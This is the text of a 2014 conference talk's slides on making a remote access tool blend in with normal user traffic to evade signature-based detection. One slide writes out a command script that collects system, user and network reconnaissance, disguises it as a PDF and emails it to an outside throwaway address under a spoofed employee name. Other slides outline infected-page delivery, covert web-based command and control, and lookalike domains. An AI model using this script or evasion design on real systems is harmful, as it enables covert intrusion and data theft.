This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
1. Hiding in Plain Sight
Rob Gillen
@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
2. Disclaimer
The content of this presentation
represents my personal views and
thoughts at the present time. This
content is not endorsed by, or
representative in any way of my
employer nor is it intended to be a
view into my work or a reflection on
the type of work that I or my group
performs. It is simply a hobby and
personal interest and should be
considered as such.
16. RAT Design
• Exe is dropped via infected page
• Queries web page for commands
• Performs commands if not done
previously
• Periodically polls for new
commands
17. Encryption
• Complex Encryption is trivial
• PBKDF – Scrypt sequential memoryhard function
• Many iterations (> 10K)
• Long key-lengths
18. Encryption Example
• Above configuration is customhardware resistant
– Takes approximately ¼ second per
guess
19. Command/Control
• Use Web2C Approach
– Commands are “issued” en masse via
normal, benign looking web pages
– Common ports
– Leverages existing HTML/server
constructs
20.
21.
22.
23. Command Text
ipconfig /all > %APPDATA%info.txt
net start >> %APPDATA%info.txt
tasklist /v >> %APPDATA%info.txt
net user >> %APPDATA%info.txt
net localgroup administrators >> %APPDATA%info.txt
netstat -ano >> %APPDATA%info.txt
net use >> %APPDATA%info.txt
copy %APPDATA%info.txt %APPDATA%output.pdf
del %APPDATA%info.txt
sendmail %APPDATA%output.pdf Status Update “Jones,
William E. wejones@yourorg.gov” itebaffe836@yopmail.com smtp.yourorg.gov
del %APPDATA%output.pdf
24. Mimic User Behavior
• Traffic Rates
– Monitor incoming/outgoing network
traffic for X days
– Configure xfil to stay within X% of
“normal”
• C2
– Exponential/randomized stand-down
– Only comm during periods of activity
25.
26.
27. Mimic User Behavior
• Target URLs
– Monitor outgoing web queries/URLs for
X days
– Use similar domain names for
malicious traffic
– Append similar/same query strings to
malicious requests